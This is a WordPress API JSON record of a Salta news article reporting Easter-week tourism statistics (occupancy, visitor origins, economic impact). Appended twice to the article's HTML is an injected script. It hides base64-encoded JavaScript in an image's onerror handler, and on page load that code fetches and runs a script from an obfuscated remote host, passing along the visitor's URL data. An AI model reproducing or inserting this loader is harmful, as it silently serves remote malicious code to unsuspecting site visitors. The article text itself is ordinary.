{"id":2477,"date":"2023-04-10T10:25:28","date_gmt":"2023-04-10T13:25:28","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2477"},"modified":"2025-08-14T00:19:33","modified_gmt":"2025-08-14T03:19:33","slug":"semana-santa-la-tasa-de-ocupacion-fue-del-834-con-un-impacto-economico-de-1-000-millones","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2477","title":{"rendered":"<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/semana-santa-la-tasa-de-ocupacion-fue-del-834-con-un-impacto-economico-de-1000-millones-88980\">Semana Santa: La tasa de ocupaci\u00f3n fue del 83,4% con un impacto econ\u00f3mico de $1.000 millones<\/a>"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#6f0721\"><em>El Ministerio de Turismo provincial public\u00f3 los indicadores del fin de semana largo con m\u00e1s de 30 mil turistas que se alojaron entre el 6 y 9 de abril en establecimientos habilitados.<\/em><\/h4>\n\n\n\n<p>El turismo tiene incidencia por su transversalidad, en diferentes sectores de la econom\u00eda de Salta, no solo en los rubros vinculados directamente a esta actividad, por este motivo se destaca el movimiento de turistas en los cuatro d\u00edas de Semana Santa en las regiones tur\u00edsticas de la provincia.<\/p>\n\n\n\n<p>El Ministerio de Turismo inform\u00f3 que la Tasa Neta de Ocupaci\u00f3n fue del 83,4 % a partir de 30549 turistas registrados en alojamientos registrados en la provincia, generando un pernocte promedio de 2,4 noches. El gasto promedio por persona se ubic\u00f3 en $15.427 y el impacto econ\u00f3mico fue de $ 1.118.379.354.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6572-semana-santa-la-tasa-de-ocupacion-fue-del-834-con-un-impacto-economico-de-1000-millones.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6572-semana-santa-la-tasa-de-ocupacion-fue-del-834-con-un-impacto-economico-de-1000-millones.jpg\" alt=\"Semana Santa: La tasa de ocupaci\u00f3n fue del 83,4% con un impacto econ\u00f3mico de $1.000 millones\" width=\"-704\" height=\"-468\"\/><\/a><\/figure><\/div>\n\n\n<p>\u201cContinuamos trabajando en el crecimiento del destino en el marco de los objetivos del plan Liderar y con la mirada puesta en que la actividad tur\u00edstica contribuye al desarrollo integral de toda la provincia\u201d, afirm\u00f3 el ministro de Turismo y Deportes&nbsp;<strong>Mario Pe\u00f1a<\/strong>. \u201cEn Semana Santa junto a los municipios se ofrecieron m\u00e1s de 200 actividades que se fusionaron con las experiencias innovadoras que va sumando el sector privado\u201d.<\/p>\n\n\n\n<p>Las regiones tur\u00edsticas con tasas m\u00e1s altas de ocupaci\u00f3n fueron Valle de Lerma (89%) con pico en Chicoana que alcanz\u00f3 un 93,3%; Valles Calchaqu\u00edes (82%) con Cachi como referencia con un 88,8%; Destinos Cercanos con 80%, en este caso con San Lorenzo con un promedio de 88,7% y&nbsp;la ciudad de Salta (87,5%).<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6573-semana-santa-la-tasa-de-ocupacion-fue-del-834-con-un-impacto-economico-de-1000-millones.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6573-semana-santa-la-tasa-de-ocupacion-fue-del-834-con-un-impacto-economico-de-1000-millones.jpg\" alt=\"Semana Santa: La tasa de ocupaci\u00f3n fue del 83,4% con un impacto econ\u00f3mico de $1.000 millones\" width=\"-731\" height=\"-485\"\/><\/a><\/figure><\/div>\n\n\n<p>El 77% de los turistas llegaron desde provincias argentinas, un 8% fueron salte\u00f1os recorriendo los diferentes municipios y el 15% internacionales, principalmente regionales (60%) y de Europa (28%).<\/p>\n\n\n\n<p>Con respecto al mercado nacional, los destinos emisivos principales fueron provincia de Buenos Aires, CABA, Santa Fe, C\u00f3rdoba, Tucum\u00e1n, Chaco, Jujuy y Mendoza. En lo internacional, sigue encabezando el ranking Brasil, seguido de Uruguay, Francia, Bolivia, Espa\u00f1a y Chile.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6574-semana-santa-la-tasa-de-ocupacion-fue-del-834-con-un-impacto-economico-de-1000-millones.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6574-semana-santa-la-tasa-de-ocupacion-fue-del-834-con-un-impacto-economico-de-1000-millones.jpg\" alt=\"Semana Santa: La tasa de ocupaci\u00f3n fue del 83,4% con un impacto econ\u00f3mico de $1.000 millones\" width=\"-925\" height=\"-621\"\/><\/a><\/figure><\/div>\n\n\n<p>En autom\u00f3vil particular llegaron el 48,6% de los turistas, en avi\u00f3n un 34,8% por la gran conectividad que tiene Salta con el pa\u00eds y con la ruta internacional clave con San Pablo, Brasil.<\/p>\n\n\n\n<p>En Semana Santa tambi\u00e9n estuvo con alto nivel de ocupaci\u00f3n el Tren a las Nubes, con un 95% de tickets vendidos y el Telef\u00e9rico San Bernardo, sigue siendo una visita obligada en la ciudad de Salta.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El Ministerio de Turismo provincial public\u00f3 los indicadores del fin de semana largo con m\u00e1s de 30 mil turistas que se alojaron entre el 6 y 9 de abril en establecimientos habilitados. El turismo tiene incidencia por su transversalidad, en diferentes sectores de la econom\u00eda de Salta, no solo en los rubros vinculados directamente a [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2478,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15],"tags":[],"class_list":{"0":"post-2477","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2477"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2477"}],"version-history":[{"count":7,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2477\/revisions"}],"predecessor-version":[{"id":7122,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2477\/revisions\/7122"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2478"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2477"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2477"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2477"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}